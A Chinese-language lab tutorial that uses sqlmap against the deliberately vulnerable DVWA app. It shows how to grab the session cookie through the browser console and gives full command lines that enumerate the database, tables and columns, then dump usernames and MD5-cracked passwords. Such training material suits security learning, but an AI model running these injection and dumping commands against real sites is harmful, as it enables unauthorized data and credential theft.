这里主要是利用dvwa环境进行工具演示
1:首选是找到sql注入的界面,也就是SQL injection界面,然后在输入框中输入任意数字,这里以1作为演示,作为一个get传入数值,url中已经显示了我们传入的变量
2:接下来是获取页面的cookie数值,打开开发者工具,按f12开启,找到控制台console,输入document.cookie回车
"security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74"就是我们需要的文本,复制过来
3.打开kali终端,输入代码
sqmap -u “引号中为当前页面的url” --cookie=“本页面我们获取的cookie” --current-db
sqlmap -u "http://333.333.333.333/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --current-db
注入成功后会出现当前数据库的名称,即dvwa,注意,–current-db是查看当前页面所属的数据库,而–dbs是查看全部的数据库
4.查看数据库中的表
sqlmap -u "http://33.33.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --tables -D dvwa
–tables是告诉工具接下来要查询表
-D代表的是数据库database,后面跟上空格和数据库名
5.查看数据库中的列
sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --columns -T users -D dvwa
-T 后紧跟空格和表名,是table的意思,这里我们查询users表
6.查询数据库列表中的内容
sqlmap -u "http://33.33.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user -T users -D dvwa
-C 是column,列的意思,后面紧跟空格和列名
也可以同时查看多个列表,中间要跟逗号
sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user,password -T users -D dvwa
sqlmap会自动解密md5
还有另一种sqlmap注入的方法,但需要提前对页面进行抓包,这个在以后介绍bp抓包工具的时候会补充上